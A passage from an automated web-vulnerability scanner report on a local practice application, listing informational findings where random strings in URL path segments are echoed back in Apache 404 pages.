<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities5cfowtwx79/csp/source/ was not found on this server.</p>
...[SNIP]...
19.141. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp3lzhe7x5z0/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp3lzhe7x5z0/source/ was not found on this server.</p>
...[SNIP]...
19.142. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source8k1zwymigo/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source8k1zwymigo/ was not found on this server.</p>
...[SNIP]...
19.143. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source/jsonpx6vszqogwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source/jsonpx6vszqogwd was not found on this server.</p>
...[SNIP]...
19.144. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistel05xs60zka/vulnerabilities/csp/source/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistel05xs60zka/vulnerabilities/csp/source/jsonp was not found on this server.</p>
...[SNIP]...
19.145. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieslpq3awun61/csp/source/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieslpq3awun61/csp/source/jsonp was not found on this server.</p>
...[SNIP]...
19.146. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp98mneurhhl/source/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp98mneurhhl/source/jsonp was not found on this server.</p>
...[SNIP]...
19.147. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source99h4pgpjfw/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source99h4pgpjfw/jsonp was not found on this server.</p>
...[SNIP]...
19.148. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source/jsonp_impossible30zg3q1ojq HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source/jsonp_impossible30zg3q1ojq was not found on this server.</p>
...[SNIP]...
19.149. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste75m1i10yk6/vulnerabilities/csp/source/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste75m1i10yk6/vulnerabilities/csp/source/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.150. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesowknpq3zmj/csp/source/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesowknpq3zmj/csp/source/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.151. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/cspvecdz78jwr/source/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/cspvecdz78jwr/source/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.152. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source21r1vwt89b/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source21r1vwt89b/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.153. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieslf5kb1newi/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieslf5kb1newi/csrf/ was not found on this server.</p>
...[SNIP]...
19.154. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csrf8oaa0x8yns/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csrf8oaa0x8yns/ was not found on this server.</p>
...[SNIP]...
19.155. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/exec/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities0kkv2yrrwv/exec/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities0kkv2yrrwv/exec/ was not found on this server.</p>
...[SNIP]...
19.156. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/exec/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/execuctjom9lgy/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:49 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/execuctjom9lgy/ was not found on this server.</p>
...[SNIP]...
19.157. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities095kil8hpe/fi/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities095kil8hpe/fi/ was not found on this server.</p>
...[SNIP]...
19.158. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/figifzec5bai/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/figifzec5bai/ was not found on this server.</p>
...[SNIP]...
19.159. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieshxthb3ku2w/fi/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieshxthb3ku2w/fi/help/ was not found on this server.</p>
...[SNIP]...
19.160. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/fi3p8qr359ep/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/fi3p8qr359ep/help/ was not found on this server.</p>
...[SNIP]...
19.161. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/fi/help6ydm21h5ff/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/fi/help6ydm21h5ff/ was not found on this server.</p>
...[SNIP]...
19.162. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities4zg33cydw3/fi/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities4zg33cydw3/fi/source/ was not found on this server.</p>
...[SNIP]...
19.163. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/ficmlv0k0ths/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/ficmlv0k0ths/source/ was not found on this server.</p>
...[SNIP]...
19.164. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/fi/source4hibzo76o8/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
